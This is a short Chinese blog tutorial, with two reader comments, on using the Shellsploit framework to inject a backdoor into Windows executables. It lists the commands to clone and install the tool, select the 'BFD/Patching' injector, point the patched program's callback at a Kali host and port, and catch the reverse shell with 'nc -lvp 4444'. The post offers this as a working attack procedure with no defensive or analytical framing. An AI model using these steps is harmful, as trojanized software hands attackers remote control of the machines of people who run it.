逍遥子

利用Shellsploit给软件注入后门
克隆项目git clone https://github.com/vasco2016/shellsploit-fr...
扫描右侧二维码阅读全文
08
2019/04

利用Shellsploit给软件注入后门

克隆项目

git clone https://github.com/vasco2016/shellsploit-framework

克隆

安装依赖

root$ sudo pip install capstone
root$ sudo pip install readline(Not necessary for windows coz preinstalled in shellsploit)
root$ sudo pip install pefile
root$ sudo pip install colorama
root$ sudo pip install pylzma

安装依赖

安装

root$ python setup.py -s/ --setup install 
root$ chmod +x shellsploit.py
root$ ./shellsploit

安装运行

运行界面

查看注入模块

show injectors

注入模块

开始注入

我们选择一个模块注入

use injectors/Windows/BFD/Patching

显示配置项

show options

配置项

参数说明

file:要注入的软件(填写路径)
host:kali的ip地址
port:端口
sessuces

使用nc进行监听

nc -lvp 4444

运行之后成功得到反弹
QQ截图20190408182059.png

Last modification:April 25th, 2019 at 04:12 pm
正在沿街乞讨中……

Leave a Comment

2 comments

  1. Wh0aMi@X10n 非主流浏览器 非主流操作系统 GOOGLE.COM GOOGLE.COM

    最后一步执行inject时显示不是PE文件怎么解决?

  2. Wh0aMi@X10n 非主流浏览器 非主流操作系统 GOOGLE.COM GOOGLE.COM

    最后一步执行inject时显示不是PE文件